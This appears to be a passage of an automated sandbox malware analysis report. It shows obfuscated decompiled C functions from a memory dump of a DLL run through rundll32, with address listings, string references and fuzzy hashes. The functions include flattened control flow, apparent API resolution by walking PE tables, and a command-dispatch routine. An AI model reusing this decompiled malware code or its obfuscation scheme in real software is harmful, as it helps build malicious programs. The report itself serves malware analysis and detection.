					while(_t145 != 0x10d238e9) {
						if(_t145 == 0x13bcd39c) {
							_t139 = E1001D290(_v64, _v92, _v76, _t165, _v96,  &_v52);
							_t174 =  &(_t174[4]);
							__eflags = _t139;
							if(__eflags != 0) {
								_t145 = 0x30fa29dc;
								continue;
							}
						} else {
							if(_t145 == 0x30fa29dc) {
								__eflags = E10009899(_t165 + 4, _v56, __eflags,  &_v52, _v60, _v80, _v84);
								_t166 =  !=  ? 1 : _t166;
							} else {
								if(_t145 != 0x388706b5) {
									goto L9;
								} else {
									_t145 = 0x10d238e9;
									continue;
								}
							}
						}
						L12:
						return _t166;
					}
					E1001F3E9(_v88, _v68, _v72, _t143,  &_v52);
					_t174 =  &(_t174[3]);
					_t145 = 0x13bcd39c;
					L9:
					__eflags = _t145 - 0x2a61d71f;
				} while (__eflags != 0);
				goto L12;
			}

0x1001caa7
0x1001caae
0x1001cab2
0x1001cab4
0x1001cabb
0x1001cac2
0x1001cac3
0x1001cac4
0x1001cac5
0x1001caca
0x1001cad2
0x1001cadb
0x1001cadd
0x1001cae4
0x1001cae9
0x1001caef
0x1001caf4
0x1001cafc
0x1001cb04
0x1001cb10
0x1001cb15
0x1001cb1b
0x1001cb23
0x1001cb2b
0x1001cb37
0x1001cb3c
0x1001cb46
0x1001cb4b
0x1001cb51
0x1001cb59
0x1001cb61
0x1001cb69
0x1001cb71
0x1001cb79
0x1001cb81
0x1001cb89
0x1001cb91
0x1001cb99
0x1001cba1
0x1001cba9
0x1001cbae
0x1001cbb6
0x1001cbc2
0x1001cbc5
0x1001cbce
0x1001cbd7
0x1001cbdb
0x1001cbe3
0x1001cbeb
0x1001cbf3
0x1001cbfb
0x1001cc03
0x1001cc0b
0x1001cc13
0x1001cc1b
0x1001cc20
0x1001cc2a
0x1001cc32
0x1001cc3a
0x1001cc42
0x1001cc4f
0x1001cc53
0x1001cc5b
0x1001cc63
0x1001cc63
0x1001cc6d
0x1001cc99
0x1001cc9e
0x1001cca1
0x1001cca3
0x1001cca5
0x00000000
0x1001cca5
0x1001cc6f
0x1001cc75
0x1001ccf8
0x1001ccfa
0x1001cc77
0x1001cc7d
0x00000000
0x1001cc7f
0x1001cc7f
0x00000000
0x1001cc7f
0x1001cc7d
0x1001cc75
0x1001ccfe
0x1001cd06
0x1001cd06
0x1001ccbe
0x1001ccc3
0x1001ccc6
0x1001cccb
0x1001cccb
0x1001cccb
0x00000000

Strings

/, xrefs: 1001CB89
,), xrefs: 1001CB2B

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,)$/
API String ID: 0-233899039
Opcode ID: 4ad18bab273ac8b3cf774fb827cc12b4d9418481b084281fa1ae0e97bf415739
Instruction ID: 65b2c97f17a7b7744a18fbb07baf764625514e653d75bdddd1878b23c210d4d9
Opcode Fuzzy Hash: 4ad18bab273ac8b3cf774fb827cc12b4d9418481b084281fa1ae0e97bf415739
Instruction Fuzzy Hash: 82516571508345AFE354CF21C489A1BBBE1FBC8788F40891DF4A69A2A0D775DA49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 100056B3, Relevance: 2.6, Strings: 2, Instructions: 111
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E100056B3(void* __edx, char _a4, signed short _a8, intOrPtr _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* __ecx;
				void* _t84;
				void* _t91;
				signed short _t97;
				signed short _t98;
				signed short _t99;
				signed int _t101;
				signed int _t102;
				intOrPtr _t111;
				signed short _t113;
				signed short* _t116;
				signed short _t117;
				signed short _t119;
				signed int* _t121;

				_t99 = _a8;
				_push(_a12);
				_push(_t99);
				_push(_a4);
				_push(__edx);
				E100056B2(_t84);
				_a8 = 0xbb3c;
				_t121 =  &(( &_v24)[5]);
				_a8 = _a8 + 0xffff0478;
				_a8 = _a8 << 0xb;
				_a8 = _a8 + 0xfffffb27;
				_a8 = _a8 ^ 0xfdfd9b26;
				_v16 = 0x694e;
				_v16 = _v16 >> 5;
				_v16 = _v16 + 0xffffd888;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0xf6f4b2b2;
				_v4 = 0xcfd5;
				_t101 = 0x77;
				_v4 = _v4 / _t101;
				_v4 = _v4 ^ 0x00007af6;
				_v20 = 0x3853;
				_v20 = _v20 + 0x2f57;
				_v20 = _v20 << 0xc;
				_v20 = _v20 << 3;
				_v20 = _v20 ^ 0x33d5042f;
				_v24 = 0x48cf;
				_v24 = _v24 >> 4;
				_v24 = _v24 + 0xa5d7;
				_v24 = _v24 ^ 0x227c1387;
				_v24 = _v24 ^ 0x227cf043;
				_v8 = 0x820c;
				_v8 = _v8 * 0x4e;
				_v8 = _v8 * 0x1d;
				_v8 = _v8 ^ 0x047d7705;
				_v12 = 0x55c9;
				_v12 = _v12 + 0xffff6fb2;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0xff8ad068;
				_t102 = _a8;
				_t91 =  *((intOrPtr*)(_t99 + 0x3c)) + _t99;
				_t111 =  *((intOrPtr*)(_t91 + 0x78 + _t102 * 8));
				if(_t111 == 0 ||  *((intOrPtr*)(_t91 + 0x7c + _t102 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t117 = _t111 + _t99;
					while(1) {
						_t94 =  *((intOrPtr*)(_t117 + 0xc));
						if( *((intOrPtr*)(_t117 + 0xc)) == 0) {
							goto L13;
						}
						_t113 = E10018DF5(_t94 + _t99, _v16, _v4, _v20, _v24);
						_t121 =  &(_t121[3]);
						_a8 = _t113;
						__eflags = _t113;
						if(_t113 == 0) {
							L15:
							return 0;
						}
						_t116 =  *_t117 + _t99;
						_t119 =  *((intOrPtr*)(_t117 + 0x10)) + _t99;
						while(1) {
							_t97 =  *_t116;
							__eflags = _t97;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t105 = _t99 + 2 + _t97;
								__eflags = _t99 + 2 + _t97;
							} else {
								_t105 = _t97 & 0x0000ffff;
							}
							_t98 = E1000CDD0(_t105, _v8, _v12, _t113);
							__eflags = _t98;
							if(_t98 == 0) {
								goto L15;
							} else {
								_t113 = _a8;
								_t116 =  &(_t116[2]);
								 *_t119 = _t98;
								_t119 =  &_a4;
								__eflags = _t119;
								continue;
							}
						}
						_t117 = _t117 + 0x14;
						__eflags = _t117;
					}
					goto L13;
				}
			}

0x100056b7
0x100056be
0x100056c2
0x100056c3
0x100056c7
0x100056c9
0x100056ce
0x100056d6
0x100056d9
0x100056e3
0x100056e8
0x100056f0
0x100056f8
0x10005700
0x10005705
0x1000570d
0x10005712
0x1000571a
0x10005728
0x1000572b
0x1000572f
0x10005737
0x1000573f
0x10005747
0x1000574c
0x10005751
0x10005759
0x10005761
0x10005766
0x1000576e
0x10005776
0x1000577e
0x1000578b
0x10005794
0x10005798
0x100057a0
0x100057a8
0x100057b0
0x100057b5
0x100057c0
0x100057c4
0x100057c6
0x100057cc
0x10005847
0x00000000
0x100057d5
0x100057d5
0x10005840
0x10005840
0x10005845
0x00000000
0x00000000
0x100057f2
0x100057f4
0x100057f7
0x100057fb
0x100057fd
0x10005852
0x00000000
0x10005852
0x10005804
0x10005806
0x10005837
0x10005837
0x10005839
0x1000583b
0x00000000
0x00000000
0x1000580a
0x10005814
0x10005814
0x1000580c
0x1000580c
0x1000580c
0x1000581f
0x10005826
0x10005828
0x00000000
0x1000582a
0x1000582a
0x1000582e
0x10005831
0x10005834
0x10005834
0x00000000
0x10005834
0x10005828
0x1000583d
0x1000583d
0x1000583d
0x00000000
0x10005840

Strings

Ni, xrefs: 100056F8
W/, xrefs: 1000573F

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Ni$W/
API String ID: 0-111194442
Opcode ID: ce07b1ab16d3e2f26c795e08b7096ef518bbb2213e0d655af138487974276c43
Instruction ID: 9a1005561c3df8b761318bfd7a223ab57cf0a9f60e4c9267babe61ed4d5f545d
Opcode Fuzzy Hash: ce07b1ab16d3e2f26c795e08b7096ef518bbb2213e0d655af138487974276c43
Instruction Fuzzy Hash: 544168B15083428FE354CF24C88480BBBF1FBC4798F518A2CF99596255EB76DA09CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1001DD78, Relevance: 2.6, Strings: 2, Instructions: 80
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1001DD78(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t69;
				void* _t73;
				void* _t76;
				intOrPtr _t79;
				signed int* _t81;

				_t73 = __ecx;
				_t81 =  &_v40;
				_v8 = 0x1b7700;
				_t79 = 0;
				_v4 = 0;
				_t76 = 0xdac552c;
				_v16 = 0x3c26;
				_v16 = _v16 | 0x2b145b71;
				_v16 = _v16 ^ 0x2b14102b;
				_v40 = 0xd45e;
				_v40 = _v40 ^ 0x28d15431;
				_v40 = _v40 * 0xf;
				_v40 = _v40 | 0xf1f7d666;
				_v40 = _v40 ^ 0xf5f7dcd7;
				_v20 = 0xc134;
				_v20 = _v20 ^ 0xfce9bf97;
				_v20 = _v20 ^ 0xfce94421;
				_v24 = 0x60c0;
				_v24 = _v24 >> 0xe;
				_v24 = _v24 ^ 0x00000a32;
				_v12 = 0x6ec6;
				_v12 = _v12 << 5;
				_v12 = _v12 ^ 0x000ddcb5;
				_v28 = 0xb783;
				_v28 = _v28 + 0x4382;
				_v28 = _v28 + 0xd9fc;
				_v28 = _v28 ^ 0x0001ab03;
				_v36 = 0xe117;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 | 0x4f01522f;
				_v36 = _v36 + 0xffffd003;
				_v36 = _v36 ^ 0x4f014085;
				_v32 = 0xf8b3;
				_v32 = _v32 * 0x65;
				_v32 = _v32 + 0xc87a;
				_v32 = _v32 ^ 0x0062f8e1;
				do {
					while(_t76 != 0x15fecb3) {
						if(_t76 == 0xdac552c) {
							_t76 = 0x15fecb3;
							continue;
						} else {
							if(_t76 != 0x172cce4b) {
								goto L8;
							} else {
								_t79 = _t79 + E10007544(_v12, _v28, _v36, _t73 + 4, _v32);
							}
						}
						L5:
						return _t79;
					}
					_t69 = E10007E30();
					_t81 = _t81 - 0xc + 0xc;
					_t76 = 0x172cce4b;
					_t79 = _t79 + _t69;
					L8:
				} while (_t76 != 0x1c39a7d);
				goto L5;
			}

0x1001dd78
0x1001dd78
0x1001dd7b
0x1001dd86
0x1001dd8d
0x1001dd91
0x1001dd93
0x1001dda0
0x1001dda8
0x1001ddb0
0x1001ddb8
0x1001ddcb
0x1001ddcf
0x1001ddd7
0x1001dddf
0x1001dde7
0x1001ddef
0x1001ddf7
0x1001ddff
0x1001de04
0x1001de0c
0x1001de14
0x1001de19
0x1001de21
0x1001de29
0x1001de31
0x1001de39
0x1001de41
0x1001de49
0x1001de4e
0x1001de56
0x1001de5e
0x1001de66
0x1001de73
0x1001de77
0x1001de7f
0x1001de87
0x1001de87
0x1001de8d
0x1001debb
0x00000000
0x1001de8f
0x1001de91
0x00000000
0x1001de93
0x1001deaf
0x1001deaf
0x1001de91
0x1001deb2
0x1001deba
0x1001deba
0x1001ded2
0x1001ded7
0x1001deda
0x1001dedc
0x1001dede
0x1001dede
0x00000000

Strings

&<, xrefs: 1001DD93
2, xrefs: 1001DE04

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &<$2
API String ID: 0-12532211
Opcode ID: 840e47962e3d73477b89a5bfd9ac43b6a925a88084486f6c4384313c70dfcef2
Instruction ID: 2d2181df3d2bb9c93a47c4eee62150f0e4f5b302c766535f93e70661617adfa9
Opcode Fuzzy Hash: 840e47962e3d73477b89a5bfd9ac43b6a925a88084486f6c4384313c70dfcef2
Instruction Fuzzy Hash: D73167719083418FD304EF25DA4A40FBBE1FBD4758F104A2EF485A6220D3B9DA498F87

Uniqueness

Uniqueness Score: -1.00%

Function 10013D7C, Relevance: 1.4, Strings: 1, Instructions: 171
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E10013D7C(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				short _v108;
				char* _v112;
				char* _v116;
				signed int _v120;
				char _v124;
				char _v644;
				char _v1164;
				void* __ecx;
				void* _t185;
				signed int _t212;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				void* _t250;

				_push(_a12);
				_t250 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E100056B2(_t185);
				_v84 = _v84 & 0x00000000;
				_v80 = _v80 & 0x00000000;
				_v92 = 0x2af249;
				_v88 = 0xa239d;
				_v72 = 0x3311;
				_v72 = _v72 | 0x7bf224ce;
				_v72 = _v72 ^ 0x7bf237de;
				_v36 = 0xf7a4;
				_v36 = _v36 + 0xffffc682;
				_v36 = _v36 + 0xffffc2a9;
				_v36 = _v36 ^ 0x000086db;
				_v68 = 0xdbd1;
				_v68 = _v68 + 0xcfce;
				_v68 = _v68 ^ 0x0001a39f;
				_v12 = 0x5909;
				_v12 = _v12 + 0x65b0;
				_v12 = _v12 >> 1;
				_v12 = _v12 + 0xffff8c6d;
				_v12 = _v12 ^ 0xfffff7ad;
				_v44 = 0x56e3;
				_v44 = _v44 + 0x126;
				_t216 = 9;
				_v44 = _v44 / _t216;
				_v44 = _v44 ^ 0x00003ea1;
				_v8 = 0x9ec;
				_t217 = 0xc;
				_v8 = _v8 / _t217;
				_t218 = 0xf;
				_v8 = _v8 / _t218;
				_v8 = _v8 ^ 0x5389c1c6;
				_v8 = _v8 ^ 0x53898368;
				_v56 = 0x8b50;
				_t219 = 0x7c;
				_v56 = _v56 * 0x7b;
				_v56 = _v56 ^ 0x0042a85f;
				_v64 = 0xa08d;
				_v64 = _v64 + 0xcc80;
				_v64 = _v64 ^ 0x00016541;
				_v40 = 0x6173;
				_v40 = _v40 | 0xc384fcd4;
				_v40 = _v40 << 0xf;
				_v40 = _v40 ^ 0x7efba2ce;
				_v24 = 0xc6dd;
				_v24 = _v24 << 5;
				_v24 = _v24 + 0xffff231a;
				_v24 = _v24 ^ 0x00179bda;
				_v48 = 0xc35f;
				_v48 = _v48 << 0xc;
				_v48 = _v48 >> 0x10;
				_v48 = _v48 ^ 0x00004803;
				_v32 = 0xc90e;
				_v32 = _v32 >> 0xb;
				_v32 = _v32 << 0xc;
				_v32 = _v32 ^ 0x0001a766;
				_v76 = 0x4072;
				_v76 = _v76 / _t219;
				_v76 = _v76 ^ 0x00003c70;
				_v28 = 0x9423;
				_v28 = _v28 + 0xffff4e74;
				_t220 = 0x19;
				_v28 = _v28 * 0x2e;
				_v28 = _v28 ^ 0xfffa9c10;
				_v16 = 0x38cb;
				_v16 = _v16 ^ 0x15f5157f;
				_v16 = _v16 << 6;
				_v16 = _v16 + 0xf435;
				_v16 = _v16 ^ 0x7d4c407a;
				_v52 = 0x39bb;
				_v52 = _v52 + 0xffffae06;
				_v52 = _v52 ^ 0xce0d0fc0;
				_v52 = _v52 ^ 0x31f2a856;
				_v60 = 0xc52f;
				_t221 = 0x65;
				_v60 = _v60 / _t220;
				_v60 = _v60 ^ 0x00004cfc;
				_v20 = 0xe49b;
				_v20 = _v20 + 0xf3d2;
				_v20 = _v20 / _t221;
				_v20 = _v20 ^ 0x00007d6c;
				E10001CB3( &_v124, _v12, 0x1e, _v44);
				E10001CB3( &_v644, _v8, 0x208, _v56);
				E10001CB3( &_v1164, _v64, 0x208, _v40);
				E10015891(_a12,  &_v644, _v24, _v48, _v32);
				E10015891(_t250,  &_v1164, _v76, _v28, _v16);
				_v120 = _v72;
				_v116 =  &_v644;
				_v112 =  &_v1164;
				_v108 = _v68 | _v36;
				_t212 = E1001C9E4(_v60, _v20,  &_v124);
				asm("sbb eax, eax");
				return  ~_t212 + 1;
			}

0x10013d87
0x10013d8a
0x10013d8c
0x10013d8f
0x10013d92
0x10013d94
0x10013d99
0x10013d9f
0x10013da3
0x10013daa
0x10013db1
0x10013db8
0x10013dbf
0x10013dc6
0x10013dcd
0x10013dd4
0x10013ddb
0x10013de2
0x10013de9
0x10013df0
0x10013df7
0x10013dfe
0x10013e05
0x10013e08
0x10013e0f
0x10013e16
0x10013e1d
0x10013e29
0x10013e2e
0x10013e33
0x10013e3a
0x10013e44
0x10013e49
0x10013e51
0x10013e56
0x10013e5b
0x10013e62
0x10013e69
0x10013e74
0x10013e75
0x10013e78
0x10013e7f
0x10013e86
0x10013e8d
0x10013e94
0x10013e9b
0x10013ea2
0x10013ea6
0x10013ead
0x10013eb4
0x10013eb8
0x10013ebf
0x10013ec6
0x10013ecd
0x10013ed1
0x10013ed5
0x10013edc
0x10013ee3
0x10013ee7
0x10013eeb
0x10013ef2
0x10013efe
0x10013f03
0x10013f0a
0x10013f11
0x10013f1e
0x10013f21
0x10013f24
0x10013f2b
0x10013f32
0x10013f39
0x10013f3d
0x10013f44
0x10013f4b
0x10013f52
0x10013f59
0x10013f60
0x10013f67
0x10013f73
0x10013f74
0x10013f79
0x10013f80
0x10013f87
0x10013f96
0x10013f99
0x10013fa8
0x10013fbf
0x10013fd1
0x10013fe8
0x10013ffe
0x10014009
0x10014012
0x1001401b
0x10014024
0x10014035
0x1001403e
0x10014046

Strings

z@L}, xrefs: 10013F44

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: z@L}
API String ID: 0-656678828
Opcode ID: 60fa0d3e1590c9607e5d51dbb1653ade0f49e62c408987f7d99e6032664efbe8
Instruction ID: 64054118f8c6f46c4d0f59fa63d6518252241b9f119ebe30aefd6ecd3cb38e95
Opcode Fuzzy Hash: 60fa0d3e1590c9607e5d51dbb1653ade0f49e62c408987f7d99e6032664efbe8
Instruction Fuzzy Hash: 18812072D0020DEBEF14CFA1D98A9DEBBB2FB44314F208159E415B6290D7B91A4ACF54

Uniqueness

Uniqueness Score: -1.00%

Function 10018831, Relevance: 1.4, Strings: 1, Instructions: 136
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10018831(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v52;
				char _v60;
				intOrPtr _v64;
				void* _v68;
				char _v120;
				void* _t100;
				void* _t113;
				void* _t117;
				void* _t119;
				void* _t121;
				void* _t123;
				void* _t125;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				void* _t161;
				void* _t163;
				void* _t165;
				void* _t166;

				_t166 = __eflags;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t100);
				_v40 = 0xa9e3;
				_v40 = _v40 | 0x2174341f;
				_v40 = _v40 ^ 0x2174d138;
				_t161 = 0;
				_v28 = 0xd1b7;
				_v28 = _v28 >> 6;
				_v28 = _v28 >> 0xa;
				_v28 = _v28 ^ 0x0000747d;
				_v24 = 0x8bdd;
				_t131 = 0x3c;
				_v24 = _v24 / _t131;
				_v24 = _v24 >> 5;
				_v24 = _v24 ^ 0x00001716;
				_v20 = 0xbd7b;
				_t132 = 0x56;
				_v20 = _v20 * 0x24;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0x00355362;
				_v12 = 0x1776;
				_t133 = 0x74;
				_v12 = _v12 / _t132;
				_v12 = _v12 + 0xffffd771;
				_v12 = _v12 * 0x66;
				_v12 = _v12 ^ 0xffefd8ce;
				_v36 = 0xe780;
				_v36 = _v36 + 0xffff8307;
				_v36 = _v36 ^ 0x00001dc1;
				_v32 = 0x334f;
				_v32 = _v32 << 9;
				_v32 = _v32 ^ 0x0066d4a3;
				_v44 = 0xfc2;
				_v44 = _v44 + 0xffff2eb0;
				_v44 = _v44 ^ 0xffff18b3;
				_v16 = 0xf408;
				_v16 = _v16 + 0xffff10d6;
				_v16 = _v16 << 0xf;
				_v16 = _v16 / _t133;
				_v16 = _v16 ^ 0x000527d6;
				E1001F3E9(_v40, _v28, _v24, __edx,  &_v120);
				_t165 = _t163 + 0x18;
				L15:
				_t113 = E10009899( &_v52, _v20, _t166,  &_v120, _v12, _v36, _v32);
				_t165 = _t165 + 0x10;
				if(_t113 != 0) {
					__eflags = E1001C04C( &_v68, _v44,  &_v52, _v16);
					if(__eflags != 0) {
						_t117 = _v64 - 1;
						__eflags = _t117;
						if(_t117 == 0) {
							E100177C0(_v68,  &_v60);
						} else {
							_t119 = _t117 - 1;
							__eflags = _t119;
							if(_t119 == 0) {
								E10007E34(_v68,  &_v60);
							} else {
								_t121 = _t119 - 1;
								__eflags = _t121;
								if(_t121 == 0) {
									E10003D4E(_v68,  &_v60);
								} else {
									_t123 = _t121 - 1;
									__eflags = _t123;
									if(_t123 == 0) {
										E10012965(_v68,  &_v60);
									} else {
										_t125 = _t123 - 6;
										__eflags = _t125;
										if(_t125 == 0) {
											E10001658(_v68,  &_v60);
										} else {
											__eflags = _t125 == 1;
											if(_t125 == 1) {
												E10002DEE(_v68,  &_v60);
											}
										}
									}
								}
							}
						}
						_t161 = _t161 + 1;
						__eflags = _t161;
					}
					goto L15;
				}
				return _t161;
			}

0x10018831
0x10018839
0x1001883e
0x1001883f
0x10018840
0x10018845
0x1001884f
0x10018858
0x1001885f
0x10018861
0x10018868
0x1001886c
0x10018870
0x10018877
0x10018883
0x10018888
0x1001888d
0x10018891
0x10018898
0x100188a3
0x100188a6
0x100188a9
0x100188ac
0x100188b3
0x100188bf
0x100188c0
0x100188c5
0x100188d0
0x100188d3
0x100188da
0x100188e1
0x100188e8
0x100188ef
0x100188f6
0x100188fa
0x10018901
0x10018908
0x1001890f
0x10018916
0x1001891d
0x10018924
0x1001892d
0x10018933
0x10018945
0x1001894a
0x100189cb
0x100189de
0x100189e3
0x100189e8
0x10018963
0x10018965
0x1001896a
0x1001896a
0x1001896b
0x100189c5
0x1001896d
0x1001896d
0x1001896d
0x1001896e
0x100189b8
0x10018970
0x10018970
0x10018970
0x10018971
0x100189ab
0x10018973
0x10018973
0x10018973
0x10018974
0x1001899e
0x10018976
0x10018976
0x10018976
0x10018979
0x10018991
0x1001897b
0x1001897b
0x1001897c
0x10018984
0x10018984
0x1001897c
0x10018979
0x10018974
0x10018971
0x1001896e
0x100189ca
0x100189ca
0x100189ca
0x00000000
0x10018965
0x100189f5

Strings

bS5, xrefs: 100188AC

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: bS5
API String ID: 0-1932987624
Opcode ID: 60c0db7c199690b9a4269612a9ff3c2463bdb260329f2ae53de997cd560263d1
Instruction ID: 23e059ff47e0506498e7a4e708a724e5c8e2fef518cb1c354503f8202edbf6a6
Opcode Fuzzy Hash: 60c0db7c199690b9a4269612a9ff3c2463bdb260329f2ae53de997cd560263d1
Instruction Fuzzy Hash: ED512671D0421EDBDF08CFA1D9468EEBBB1FF44344F148119E405BA294EBB5AB86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1001B1D2, Relevance: 1.4, Strings: 1, Instructions: 132
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E1001B1D2() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t110;
				intOrPtr _t111;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				intOrPtr* _t121;
				void* _t123;
				void* _t134;
				signed int* _t136;

				_t136 =  &_v40;
				_v40 = 0x70f8;
				_v40 = _v40 >> 7;
				_v40 = _v40 + 0xffff630a;
				_t118 = 0x64;
				_v40 = _v40 / _t118;
				_v40 = _v40 ^ 0x028f2fd3;
				_t134 = 0x35b1160f;
				_v16 = 0x47d6;
				_v16 = _v16 ^ 0xd8da0719;
				_v16 = _v16 >> 1;
				_v16 = _v16 ^ 0x6c6d66b3;
				_v36 = 0xc09c;
				_t119 = 0x42;
				_v36 = _v36 / _t119;
				_v36 = _v36 | 0x4c951b1c;
				_t120 = 0x76;
				_v36 = _v36 / _t120;
				_v36 = _v36 ^ 0x00a646bb;
				_v4 = 0xd906;
				_v4 = _v4 + 0xffffa865;
				_v4 = _v4 ^ 0x0000cebc;
				_v12 = 0x1924;
				_v12 = _v12 << 0xa;
				_v12 = _v12 ^ 0x5770cda5;
				_v12 = _v12 ^ 0x57146551;
				_v20 = 0x57d8;
				_v20 = _v20 + 0x3c9b;
				_v20 = _v20 | 0x6624950d;
				_v20 = _v20 + 0x7d86;
				_v20 = _v20 ^ 0x662576da;
				_v24 = 0x7f33;
				_v24 = _v24 + 0x8e9f;
				_v24 = _v24 * 0x52;
				_v24 = _v24 * 0x41;
				_v24 = _v24 ^ 0x15f1c515;
				_v8 = 0xdf1f;
				_v8 = _v8 ^ 0x9b779287;
				_v8 = _v8 << 4;
				_v8 = _v8 ^ 0xb774c662;
				_v28 = 0x1b91;
				_v28 = _v28 ^ 0xac548ac7;
				_v28 = _v28 * 0x57;
				_v28 = _v28 + 0xffff181d;
				_v28 = _v28 ^ 0x90bc1e59;
				_v32 = 0x7551;
				_v32 = _v32 >> 0xb;
				_v32 = _v32 ^ 0xb8e7ca91;
				_v32 = _v32 * 0x76;
				_v32 = _v32 ^ 0x3ad707f4;
				_t121 =  *0x10021404; // 0x0
				while(_t134 != 0x472a097) {
					if(_t134 == 0x148a4b2c) {
						_t111 = E1001D1E3(_v36, _t121, _v4, _t121, _t121, _v12);
						_t121 =  *0x10021404; // 0x0
						_t136 =  &(_t136[5]);
						_t134 = 0x472a097;
						 *_t121 = _t111;
						continue;
					} else {
						if(_t134 != 0x35b1160f) {
							L8:
							if(_t134 != 0xfe78997) {
								continue;
							}
						} else {
							_push(_t121);
							_t123 = 0x18;
							_t121 = E100157E8(_t123);
							 *0x10021404 = _t121;
							if(_t121 != 0) {
								_t134 = 0x148a4b2c;
								continue;
							}
						}
					}
					return 0 | _t121 != 0x00000000;
				}
				_t110 = E1000D6D8(_v20, _v24, _t121, E10016B45, _v8, _t121, 0, _t121, _t121, _v28, _v32);
				_t121 =  *0x10021404; // 0x0
				_t136 =  &(_t136[9]);
				_t134 = 0xfe78997;
				 *((intOrPtr*)(_t121 + 0x14)) = _t110;
				goto L8;
			}

0x1001b1d2
0x1001b1d5
0x1001b1de
0x1001b1e2
0x1001b1f2
0x1001b1f7
0x1001b1fd
0x1001b205
0x1001b20a
0x1001b217
0x1001b224
0x1001b22d
0x1001b235
0x1001b241
0x1001b246
0x1001b24c
0x1001b258
0x1001b25b
0x1001b25f
0x1001b267
0x1001b26f
0x1001b277
0x1001b27f
0x1001b287
0x1001b28c
0x1001b294
0x1001b29c
0x1001b2a4
0x1001b2ac
0x1001b2b4
0x1001b2bc
0x1001b2c4
0x1001b2cc
0x1001b2d9
0x1001b2e2
0x1001b2e6
0x1001b2ee
0x1001b2f6
0x1001b2fe
0x1001b303
0x1001b30b
0x1001b313
0x1001b320
0x1001b324
0x1001b32c
0x1001b334
0x1001b33c
0x1001b341
0x1001b34e
0x1001b352
0x1001b35a
0x1001b360
0x1001b366
0x1001b3a1
0x1001b3a6
0x1001b3ac
0x1001b3af
0x1001b3b1
0x00000000
0x1001b368
0x1001b36e
0x1001b3e7
0x1001b3e9
0x00000000
0x00000000
0x1001b370
0x1001b378
0x1001b37b
0x1001b382
0x1001b384
0x1001b38c
0x1001b38e
0x00000000
0x1001b38e
0x1001b38c
0x1001b36e
0x1001b3fd
0x1001b3fd
0x1001b3d4
